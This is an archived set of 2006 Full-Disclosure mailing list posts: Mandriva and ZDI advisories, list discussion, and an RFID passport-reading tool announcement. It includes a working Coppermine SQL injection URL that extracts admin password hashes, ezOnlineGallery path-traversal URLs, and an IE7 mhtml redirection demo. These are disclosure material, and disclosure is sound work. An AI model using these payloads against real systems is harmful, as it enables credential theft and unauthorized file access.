Re: [Full-disclosure] Yahoo! Messenger Service 18 Remote Buffer Overflow Vulnerability
Did Yahoo put out a security notification yet? I don't see any mention of a bug fix on the yahoo messenger page. And when I turn on my yahoo messenger (ver 8.0.0.701), shouldn't I be alerted to receive an update? - Siddhartha -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Gadi Evron Sent: Thursday, October 26, 2006 7:46 AM To: [EMAIL PROTECTED] Cc: full-disclosure@lists.grok.org.uk; bugtraq@securityfocus.com Subject: Re: [Full-disclosure] Yahoo! Messenger Service 18 Remote Buffer Overflow Vulnerability On Thu, 26 Oct 2006 [EMAIL PROTECTED] wrote: So how fast is this record time? As fast as Hitler's Blitzkrieg tactics? That's pretty fast! Yahoo! released a fixed version. Gadi. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] IE7 is a Source of Problem - Secunia IE7 Release Incident of October 2006
Hi. On 10/27/06, LIUDIEYU dot COM [EMAIL PROTECTED] wrote: Upon IE7 release, Secunia published SA22477 titled `Internet Explorer 7 mhtml: Redirection Information Disclosure`. It seems to be able to make redirecting with mhtml fail by returning the response by 201 or 202. There for, It is possible for this to prevent trying to steal the contents of your server via mhtml redirection. -- HASEGAWA Yosuke [EMAIL PROTECTED] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] MHL-2006-003 Public Advisory: ezOnlineGallery Multiple Security Issues
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 MHL-2006-003 - Public Advisory +---+ | ezOnlineGallery Multiple Security Issues | +---+ PUBLISHED ON October 26th, 2006 PUBLISHED AT http://www.mayhemiclabs.com/advisories/MHL-2006-003.txt http://www.mayhemiclabs.com/wiki/wikka.php?wakka=MHL2006003 PUBLISHED BY Mayhemic Labs http://www.mayhemiclabs.com security AT mayhemiclabs DOT com GPG key: 0x56143F84 APPLICATION ezOnlineGallery http://www.ezonlinegallery.com/ AFFECTED VERSIONS Versions 1.3 and below ISSUES ezOnlineGallery allows disclosure of certain data about the system it is installed on. 1) Valid Path Disclosures By editing the album variable when the show_album action is called on ezgallery.php, an attacker can verify the existance of any directory on a system. The system will attempt to display an album if the path is valid, and will return an error if the path is invalid. EXAMPLE: ezgallery.php?action=show_albumalbum=../../../../../etc/ 2) File Disclosure By editing both the album and image variables on image.php an attacker can view any JPG, BMP, or PNG that the apache process has read access to. image.php?album=../../home/jrluser/girlfriendpicsimage=nude.jpg WORKAROUNDS None at this time SOLUTIONS Upgrade to 1.3.2 Beta REFERENCES ezOnlineGallery - http://www.ezonlinegallery.com/ TIMELINE October 26th, 2006 Vendor/Developer Notified Vendor/Developer Fixes Issues Public Release ADDITIONAL CREDIT N/A LICENSE Creative Commons Attribution-ShareAlike License http://creativecommons.org/licenses/by-sa/2.5 -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.5 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFFQWG1zjnMaVYUP4QRAmn5AKCggkwoeoEwskcExkJtNnwWC4UBkQCgjetQ 1bjFMzRtPuveUAU6a0+ZaWg= =yUPA -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Vulnerability automation and Botnet solutions I expect to see this year
*. Gadi Intelligence (very limited) On 10/26/06, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: -BEGIN PGP SIGNED MESSAGE-Hash: SHA1On Tue, 24 Oct 2006 10:52:58 -0500 Gadi Evron [EMAIL PROTECTED]wrote:So, what I am going to talk about... A tad bit of history onvulnerabilities and their use on the Internet, and then, what weare going to see on corporate, ISP and Internet security relating to botnetsthiscoming year.Vulnerabilities don't exist for the sake of vulnerabilities. Theyare usedfor something, they are a tool. Botnets are much the same, using vulnerabilities on the next layer.This past year we have seen how disclosed vulnerabilities, patchedvulnerabilities and 0days have been utilized by automated kits. Aninter-linked system of websites which download malicious code (update thekits), try to infect millions of users from just a couple dozenmain hubs,and react to the environment.If a certain vulnerability is seen to be more successful oncertain OS types or if one is found to not work, the kit will be fixedaccordinglyand distributed. Often immediately after a patch Tuesday, likelythat sameFriday evening.This way, income can be maximized with the number of infections, datastolen and thus ROI. Both from the expected response time of thevendorsas well as how many victims can be reached in that window.One such kit is Webattacker, which has recently been getting more known inpublic circles.Where we areThat does it, botnets are mainstream. People did not yetunderstand theidea that software vulnerabilities facilitate an attack (=are not theattack) and botnets facilitate much the same, only on a differentlevel. Iwill discuss that further after what interests everybody.Solutions in the coming year! First, many products in the industry have been implementedsuccessfully inthe past, just as solutions of necessity, not products. Someweresuccessful, some failed. Some (services) have been supplied to the richand connected, some haven't.Botnets are now main-stream, which means other lesser beings andcorporations want these services. They want to be protected in ahostileworld. They realize the Internet is not a safe place, and plan accordingly.Services we will see more and more of:*. Intelligence (very limited), showing IP addresses for botnetcommandand control (CC) servers, which your computers may be connecting to(i.e. compromised).*. Intelligence (very limited), showing IP addresses that youcontrolwhich show in spam (meaning compromised hosts) or show in otherways inbotnet data being collected. Mostly, this is spam-oriented and the rest ofthe intelligence is barely noticeable as of yet.*. Intelligence (very limited) on the millions on millions ofcredentials(for sites, credit cards, banks, eCommerce systems, etc.) and identitiesbeing stolen every single day by massive phishing man-in-the-middle trojanhorses.*. Intelligence (very limited) other black listing services.In the past, a limited version of these services was provided, but verysecretly, and at a very high cost.Products:Botnet products on the network can either detect internal problems(suchas bots on the corporate or ISP network or the spreading of infections) orexternal problems (such as CC servers or attacks from the world).Thesecan be based on behavior or intelligence.Solutions, which we discussed in the past and are now going to manifest:Intelligence-based (until now only supplied by select groups toselectgroups) -*. Known bad IPs. Etc. Much like in spam, only for other realms.*. Known bad URLs or domain names. Etc. Much like in spam, only for otherrealms.Detection -*. IDS approach (decent but not even close to cutting it),*. DNS monitoring approach (very cool, but is just one approach inalayered solution). *. Netflow approach (proven for years now, only one approach,howeveruseful, which is growing more limited every day).Respond and quarantine -*. Walled garden approach (close off/limit suspicious or confirmed compromised computers until they clean themselves. NOt successfulincurrent solutions, shows promise).*. Try to fix the situation remotely (solve the vulnerabilities,etc. ahead of time or remove after the fact). There are several others, but these are the main ones describingthe 10 orso products we are about to see (all of which are alreadyavailablepublicly as open source, privately developed tools or unsuccessful solutions due to lack of client awareness and interest).QoS, virtualization and half decent intelligence gathering willcomenext. Other solutions I will not waste breath speaking of right now, theywill appear for public consumption once the effectiveness of thesolutionsabove (or the better ones there) is done to dust.What's next?Decent, real decent, intelligence, and support response tools to mitigatewhat you find in conjunction with a response team trained to dealwiththousands of real incidents rather than mark check-lists on acouple anhour to a couple a month. That's simply not being aware of what's happening in your network.Many
[Full-disclosure] [ Capture Skype trafic ]
All is in the mail's subject. I need to match this crazy-encrypted-random trafic, to destroy it (I think I'm not alone to need informations on this product). I've found some work on the BlackHats slides, but skype updates.. Thx in advance. -- Tyop? Student. Excuse my english. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] parallels Desktop file permission notice
While testing the useful parallels for osx, i noticed that this piece of software: root 2818 0.0 0.031780152 ?? Ss5:33PM 0:01.57 /Library/StartupItems/Parallels/prl_dhcpd wrote this file: x:~ xxx$ ls -al /Library/Parallels/.dhcpd_configuration with the following permission: -rw-rw-rw- 1 root wheel 0 Oct 26 17:32 /Library/Parallels/.dhcpd_configuration The parallels release is: Parallels Desktop for Mac - Build 1940 (October 12, 2006) Bye -naif ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [ Capture Skype trafic ]
use a packet analyzer proxy bluecoat comes to mind as one that works quite well... Exibar - Original Message - From: Tyop? [EMAIL PROTECTED] To: full-disclosure@lists.grok.org.uk; bugtraq@securityfocus.com Sent: Friday, October 27, 2006 7:27 AM Subject: [Full-disclosure] [ Capture Skype trafic ] All is in the mail's subject. I need to match this crazy-encrypted-random trafic, to destroy it (I think I'm not alone to need informations on this product). I've found some work on the BlackHats slides, but skype updates.. Thx in advance. -- Tyop? Student. Excuse my english. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [ Capture Skype trafic ]
On 10/27/06, Exibar [EMAIL PROTECTED] wrote: From: Tyop? [EMAIL PROTECTED] All is in the mail's subject. I need to match this crazy-encrypted-random trafic, to destroy it (I think I'm not alone to need informations on this product). I've found some work on the BlackHats slides, but skype updates.. use a packet analyzer proxy bluecoat comes to mind as one that works quite well... http://www.bluecoat.com/downloads/whitepapers/BCS_controlling_skype_wp.pdf Bluecoat doesn't match the packets, sorry. quote: It is also recommended that enterprises block downloads of URLs ending with skype.exe. This will prevent new Skype software from being downloaded to enterprise machines. This is very funny. ^-^ -- Tyop? Please excuse my english. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Vulnerability automation and Botnet solutions I expect to see this year
On 10/27/06, poo [EMAIL PROTECTED] wrote: *. Gadi Intelligence (very limited) You are just jealous that he has a job in infosec,and you are a 3rd shift helpdesk technician.I guess the official ratio of trolls to normal people have passed 1:1 on FD, sweet! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] ZDI-06-035: Novell eDirectory NDS Server Host Header Buffer Overflow Vulnerability
ZDI-06-035: Novell eDirectory NDS Server Host Header Buffer Overflow Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-06-035.html October 26, 2006 -- CVE ID: CVE-2006-5478 -- Affected Vendor: Novell -- Affected Products: Novell eDirectory 8.8.1 -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability since October 26, 2006 by Digital Vaccine protection filter ID 4519. For further product information on the TippingPoint IPS: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Novell eDirectory. Authentication is not required to exploit this vulnerability. The specific flaw exists within the httpstk.dll library within the dhost.exe web interface of the eDirectory Host Environment. The web interface does not validate the length of the HTTP Host header prior to using the value of that header in an HTTP redirect. This results in an exploitable stack-based buffer overflow. -- Vendor Response: Novell has issued an update to correct this vulnerability. More details can be found at: http://support.novell.com/cgi-bin/search/searchtid.cgi?/2974592.htm http://support.novell.com/cgi-bin/search/searchtid.cgi?/2974603.htm http://support.novell.com/cgi-bin/search/searchtid.cgi?/3723994.htm -- Disclosure Timeline: 2006.08.14 - Vulnerability reported to vendor 2006.10.26 - Digital Vaccine released to TippingPoint customers 2006.10.26 - Public release of advisory -- Credit: This vulnerability was discovered by Manuel Santamarina Suarez. -- About the Zero Day Initiative (ZDI): Established by TippingPoint, a division of 3Com, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. 3Com does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, 3Com provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, 3Com provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. AdmID:518ABD3B8A39BA854DA088FE53F4AEB6 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Coppermine 1.4.9 SQL injection
// http://www.w4cking.com CREDIT: w4ck1ng.com PRODUCT: Coppermine 1.4.9 http://coppermine-gallery.net/ VULNERABILITY: SQL Injection NOTES: - SQL injection can be used to obtain password hash - You must be a registered user to access the vulnerable page, picmgr.php. - The table prefix must be known. POC: victim/picmgr.php?aid=123%20UNION%20SELECT%20user_id,user_group,concat(user_name,char(58,58),user_password)%20FROM%20cpg149_users%20right%20join%20cpg149_usergroups%20on%20cpg149_users.user_group%20=%20cpg149_usergroups.group_id%20where%20cpg149_usergroups.has_admin_access%20=%201%20-- ADVISORY EXPLOIT (requires registration): http://www.w4ck1ng.com/board/showthread.php?t=1856 // ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDKSA-2006:188 ] - Updated mono packages fix vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2006:188 http://www.mandriva.com/security/ ___ Package : mono Date: October 27, 2006 Affected: 2007.0 ___ Problem Description: Sebastian Krahmer of the SUSE security team found that the System.CodeDom.Compiler classes in mono used temporary files in an insecure way that could allow a symbolic link attack to overwrite arbitrary files with the privileges of the user running a program that made use of those classes. Updated packages have been patched to correct this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5072 ___ Updated Packages: Mandriva Linux 2007.0: 5c1d837109090a4c1495c4924f8fc925 2007.0/i586/jay-1.1.17.1-5.1mdv2007.0.i586.rpm a486412b052a429ec5bd9ceaae114db4 2007.0/i586/libmono0-1.1.17.1-5.1mdv2007.0.i586.rpm 32768af3b25f2bb1776f9426775397e8 2007.0/i586/libmono0-devel-1.1.17.1-5.1mdv2007.0.i586.rpm 8b37c8f8df6f91ec2973008a816151ad 2007.0/i586/libmono-runtime-1.1.17.1-5.1mdv2007.0.i586.rpm 61cc4835ec672e4bd7f5af5a0c83061b 2007.0/i586/mono-1.1.17.1-5.1mdv2007.0.i586.rpm 9fbaac2bc86415d18065981d016e5368 2007.0/i586/mono-data-sqlite-1.1.17.1-5.1mdv2007.0.i586.rpm b846f560465eb406bb8b9f7c441113a6 2007.0/i586/mono-doc-1.1.17.1-5.1mdv2007.0.i586.rpm 5bc45f12bb8976dd35175f89ab069b9e 2007.0/SRPMS/mono-1.1.17.1-5.1mdv2007.0.src.rpm Mandriva Linux 2007.0/X86_64: 0d563100452ae01ec8adf2b0f8051180 2007.0/x86_64/jay-1.1.17.1-5.1mdv2007.0.x86_64.rpm f824b9c7a96c75957a4160c757ada097 2007.0/x86_64/lib64mono0-1.1.17.1-5.1mdv2007.0.x86_64.rpm 23ae0bb392d84c601828abf1f8e2c730 2007.0/x86_64/lib64mono0-devel-1.1.17.1-5.1mdv2007.0.x86_64.rpm bee2f1bdf1ada1531e55d7e784fe97d2 2007.0/x86_64/libmono-runtime-1.1.17.1-5.1mdv2007.0.x86_64.rpm c56e24acd959aa86d1849c8567d7a92e 2007.0/x86_64/mono-1.1.17.1-5.1mdv2007.0.x86_64.rpm c09e6a39f294b2cf8847b7203d378c4f 2007.0/x86_64/mono-data-sqlite-1.1.17.1-5.1mdv2007.0.x86_64.rpm 609cf64204d1198f67253be5077f3a85 2007.0/x86_64/mono-doc-1.1.17.1-5.1mdv2007.0.x86_64.rpm 5bc45f12bb8976dd35175f89ab069b9e 2007.0/SRPMS/mono-1.1.17.1-5.1mdv2007.0.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2.2 (GNU/Linux) iD8DBQFFQkX2mqjQ0CJFipgRAgO2AKCBW2GqbExESNuablc251o6BoYEYACdGVl/ VCw7tzls5lTA4MpSbrKoYqk= =xt1i -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDKSA-2006:189 ] - Updated xsupplicant fixes possible remote root stack smash vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2006:189 http://www.mandriva.com/security/ ___ Package : xsupplicant Date: October 27, 2006 Affected: 2006.0, 2007.0 ___ Problem Description: Yannick Van Osselaer discovered a stack overflow in Xsupplicant, which could potentially be exploited by a remote, authenticated user to gain root priviledges. Additional code cleanups to fix potential memory leaks are also included. Updated packages have been patched to correct this issue. ___ Updated Packages: Mandriva Linux 2006.0: d35f3cee0c66c5778acd39a64e46704a 2006.0/i586/xsupplicant-1.0.1-3.1.20060mdk.i586.rpm 3df3a3e96b0be68eda96dcffd557a014 2006.0/i586/xsupplicant-doc-1.0.1-3.1.20060mdk.i586.rpm 3685820c2527d4608a2fc1722eba6b63 2006.0/SRPMS/xsupplicant-1.0.1-3.1.20060mdk.src.rpm Mandriva Linux 2006.0/X86_64: d2e450ac1c2f4dac7968a08a8cb2f2c4 2006.0/x86_64/xsupplicant-1.0.1-3.1.20060mdk.x86_64.rpm 6027f2b00d4d2c966bcacbdd38a6895b 2006.0/x86_64/xsupplicant-doc-1.0.1-3.1.20060mdk.x86_64.rpm 3685820c2527d4608a2fc1722eba6b63 2006.0/SRPMS/xsupplicant-1.0.1-3.1.20060mdk.src.rpm Mandriva Linux 2007.0: b122033612442db1eaf3795e74947a25 2007.0/i586/xsupplicant-1.2.6-1.1mdv2007.0.i586.rpm 5919e8bb474dea74a5b0e80746d3821c 2007.0/i586/xsupplicant-devel-1.2.6-1.1mdv2007.0.i586.rpm 2e890e6b58ab87e6104bbd2cbcfac297 2007.0/i586/xsupplicant-doc-1.2.6-1.1mdv2007.0.i586.rpm b126177e58162c5bbeddda641d874423 2007.0/SRPMS/xsupplicant-1.2.6-1.1mdv2007.0.src.rpm Mandriva Linux 2007.0/X86_64: 46878703a426d4d5770c1572c397f54c 2007.0/x86_64/xsupplicant-1.2.6-1.1mdv2007.0.x86_64.rpm bdc5f953605ab0404eb1075e0cb42ac6 2007.0/x86_64/xsupplicant-devel-1.2.6-1.1mdv2007.0.x86_64.rpm 3023ec5a0ee41f083c6372add22e8444 2007.0/x86_64/xsupplicant-doc-1.2.6-1.1mdv2007.0.x86_64.rpm b126177e58162c5bbeddda641d874423 2007.0/SRPMS/xsupplicant-1.2.6-1.1mdv2007.0.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2.2 (GNU/Linux) iD8DBQFFQkZumqjQ0CJFipgRAhCXAJ4sl4g1yC8fZmM5P5VsCG0BY0LIhQCeOLd4 gRDdYM017wabjXD2lhPNAL4= =xECA -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDKSA-2006:190 ] - Updated mutt packages fix multiple vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2006:190 http://www.mandriva.com/security/ ___ Package : mutt Date: October 27, 2006 Affected: 2006.0, 2007.0, Corporate 3.0 ___ Problem Description: A race condition in the safe_open function in the Mutt mail client 1.5.12 and earlier, when creating temporary files in an NFS filesystem, allows local users to overwrite arbitrary files due to limitations of the use of the O_EXCL flag on NFS filesystems. (CVE-2006-5297) The mutt_adv_mktemp function in the Mutt mail client 1.5.12 and earlier does not properly verify that temporary files have been created with restricted permissions, which might allow local users to create files with weak permissions via a race condition between the mktemp and safe_fopen function calls. (CVE-2006-5298) Updated packages have been patched to correct these issues. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5297 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5298 ___ Updated Packages: Mandriva Linux 2006.0: 261e9e3555851ba4cc334f3bb06267d7 2006.0/i586/mutt-1.5.9i-9.2.20060mdk.i586.rpm b313483f29ba39476e78cea797408eac 2006.0/i586/mutt-utf8-1.5.9i-9.2.20060mdk.i586.rpm 47d904f3fc3a0fa6bdaf85bf5fb94672 2006.0/SRPMS/mutt-1.5.9i-9.2.20060mdk.src.rpm Mandriva Linux 2006.0/X86_64: 122a0f95939a3d4595e1d319bf009bfb 2006.0/x86_64/mutt-1.5.9i-9.2.20060mdk.x86_64.rpm e51bb69c94c99c4e8c449d4ca0380468 2006.0/x86_64/mutt-utf8-1.5.9i-9.2.20060mdk.x86_64.rpm 47d904f3fc3a0fa6bdaf85bf5fb94672 2006.0/SRPMS/mutt-1.5.9i-9.2.20060mdk.src.rpm Mandriva Linux 2007.0: be6f583809fb4508ddc48022aba020fe 2007.0/i586/mutt-1.5.11-5.1mdv2007.0.i586.rpm d85e2389a6d1ff9823506355821cd276 2007.0/i586/mutt-utf8-1.5.11-5.1mdv2007.0.i586.rpm b7254bd46750dcb9a5e5aac131bb9a2a 2007.0/SRPMS/mutt-1.5.11-5.1mdv2007.0.src.rpm Mandriva Linux 2007.0/X86_64: affd060afcfedfedc233cf83b4df3f38 2007.0/x86_64/mutt-1.5.11-5.1mdv2007.0.x86_64.rpm 5c13b34493cbb85dff800bfc2fabfd8a 2007.0/x86_64/mutt-utf8-1.5.11-5.1mdv2007.0.x86_64.rpm b7254bd46750dcb9a5e5aac131bb9a2a 2007.0/SRPMS/mutt-1.5.11-5.1mdv2007.0.src.rpm Corporate 3.0: 2a9c81d26ccc33ea0044052e35ba88ec corporate/3.0/i586/mutt-1.5.5.1i-2.2.C30mdk.i586.rpm 3777210099ca87e13417169d286e558c corporate/3.0/i586/mutt-utf8-1.5.5.1i-2.2.C30mdk.i586.rpm f3653a6b8156847e3d860638f70c12a6 corporate/3.0/SRPMS/mutt-1.5.5.1i-2.2.C30mdk.src.rpm Corporate 3.0/X86_64: 231d08a551dd833ce142ebcddd56778d corporate/3.0/x86_64/mutt-1.5.5.1i-2.2.C30mdk.x86_64.rpm 7a6a1046541dce5468360c0fdee6564e corporate/3.0/x86_64/mutt-utf8-1.5.5.1i-2.2.C30mdk.x86_64.rpm f3653a6b8156847e3d860638f70c12a6 corporate/3.0/SRPMS/mutt-1.5.5.1i-2.2.C30mdk.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2.2 (GNU/Linux) iD8DBQFFQka3mqjQ0CJFipgRAlqRAKDDlPfkR9u6T5c+R3mh/NGbfIOXnQCgt9ws 20lGgVeaAjPeDxqF1KnSflo= =UhHL -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] RFID enabled e-passport skimming proof of concept code released (RFIDIOt)
The latest version of RFIDIOt, the open-source python library for RFID exploration/manipulation, contains code that implements the ICAO 9303 standard for Machine Readable Travel Documents in the form of a test program called 'mrpkey.py'. This program will exchange crypto keys with the passport and read and display the contents therein, including the facial image and the personal data printed in the passport. Currently the data read is limited to the following objects: Data Group: 61 (EF.DG1 Data Recorded in MRZ) Data Group: 75 (EF.DG2 Encoded Identification Features - FACE) Other Data Groups will be implemented as and when examples come to the author's attention. The ICAO standard relies on a 'secret' key to protect the RFID chip from casual reading, which is derived from data printed inside the passport. However, this data is also potentially available by other means, so the key for a specific passport could be derived without physical access to the passport. The information required is as follows: The Passport number The Date Of Birth of the holder The Expiry Date of the Passport (Each of the fields also has a check digit which can be calculated by the software if not otherwise available). The author has previously shown that this data can be obtained through other channels, such as poorly secured websites, as it is a subset of the data that is required by the US Homeland Security for Advance Passenger Information, and is therefore commonly collected by airlines and other associated organisations. This article, from the UK national newspaper The Guardian, gives more details of one of the techniques used: http://www.guardian.co.uk/idcards/story/0,,1766266,00.html Others have also highlighted the possibility of bruteforcing the keys, given that the components are largely predictable, giving a much smaller keyspace than might otherwise be supposed: http://www.riscure.com/2_news/passport.html The demonstration code (RFIDIOt.py version 0.1g) can be found here: http://rfidiot.org The ICAO 9303 standard documents can be found here: http://www.icao.int/mrtd/publications/doc.cfm Enjoy! Adam -- Adam Laurie Tel: +44 (0) 1304 814800 The Bunker Secure Hosting Ltd. Fax: +44 (0) 1304 814899 Ash Radar Station http://www.thebunker.net Marshborough Road Sandwichmailto:[EMAIL PROTECTED] Kent CT13 0PL UNITED KINGDOM PGP key on keyservers ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] IE7 is a Source of Problem - Secunia IE7 Release Incident of October 2006
Dear Mi/aster Liu Die Yu, I would like to let you know that i know you and i greatly respect your work. I'm not a security expert, but when i speak about IE vulnerabilities; i speak about Liu Die Yu just as when i speak about oracle vulnerabilities, i speak about *Litchfield when i speak about shatter attacks, i speak about Brett Moore when i speak about games vulnerabilities, i speak about Luigi Auriemma when i speak about web vulnerabilities, i speak about Rgod when i speak about office vulnerabilities, i speak about Class101 i speak also about HD Moore and more guys... it's just as speaking about reggae without speaking about Bob Marley or about how to make money without to speak about Bill Gates (or Dave Aitel) So, for you and these respectable legends: I SALUTE YOU! We all have only one life, and not any time, but legends never die... Thanks /JA * LIUDIEYU dot COM a écrit : Upon IE7 release, Secunia published SA22477 titled `Internet Explorer 7 mhtml: Redirection Information Disclosure`. Here I figured a straightforward demo - navigate IE7 to: * mhtml:http://www.google.com/url?q=http://www.yahoo.com/ Google redirects to Yahoo, Yahoo content is loaded, but browser location is not updated. Microsoft blogs assure vulnerability brought up by Secunia is not in IE7, technically, rather, it's Outlook Express; and as usual, words of Microsoft were well honored by several public media sources. Microsoft do not even send the slightest comment that IE is a source of problem - despite there involves cross-domain data compromise, HTTP redirection, ActiveX(DOM also works) ... all in all, when this attack happens, it got to be IE and no other. Let me sum up: in this case IE is vulnerable, only IE is vulnerable, and Microsoft say These reports are technically inaccurate: the issue concerned in these reports is not in Internet Explorer 7 (or any other version) at all. Upon seeing mhtml:, it reminds of a magnificent historic incident which also involved mhtml: -- an IE exploit so perfectly and widely utilized that it made CERT suggest Use a different web browser(CERT KB VU#323070), and firstly initiated the boom of Firefox. Of course Microsoft is unlikely to say technically this is also not IE's problem. At last allow me to put an off-topic yet sentimental complain ... Quite a while ago, when I got IE exploits and Secunia broadcasted about them, my name was in every news report; This month same situation, codedreamer - original finder of the mhtml: thing broadcasted by Secunia - was not properly given credit ... no mentioning in news reports, no mentioning in the famous first ever IE7 advisory SA22477, codedreamer made the whole thing yet Secunia gave but one single line of credit in bottom of demo The test is based on Proof of Concept code by codedreamer. Let me say I'm a man who believes in paying respect, thus I made this little complain, paying my respect to codedreamer. Best Wishes for All Firefox Surfers and Firefox 2.0 Liu Die Yu 25 OCT 06 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDKSA-2006:192 ] - Updated ruby packages fix DoS vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2006:192 http://www.mandriva.com/security/ ___ Package : ruby Date: October 27, 2006 Affected: 2006.0, 2007.0, Corporate 3.0, Corporate 4.0 ___ Problem Description: The CGI library in Ruby 1.8 allowed a remote attacker to cause a Denial of Service via an HTTP request with a multipart MIME body that contained an invalid boundary specifier, which would result in an infinite loop and CPU consumption. Updated packages have been patched to correct this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5467 ___ Updated Packages: Mandriva Linux 2006.0: f0272f52ef6c1997871a8e6ec02e1bd7 2006.0/i586/ruby-1.8.2-7.4.20060mdk.i586.rpm b7726c3839fdd0acc10108de90d188c3 2006.0/i586/ruby-devel-1.8.2-7.4.20060mdk.i586.rpm d6eef115bcdc8eb7c35df35e7fc1ca66 2006.0/i586/ruby-doc-1.8.2-7.4.20060mdk.i586.rpm 8fc499b4fea37a0c3ff31bb2047d639b 2006.0/i586/ruby-tk-1.8.2-7.4.20060mdk.i586.rpm 3a57108ef04cb1efab8640dcb0029fb1 2006.0/SRPMS/ruby-1.8.2-7.4.20060mdk.src.rpm Mandriva Linux 2006.0/X86_64: cf8394aec203b6cb6bf0de061644887f 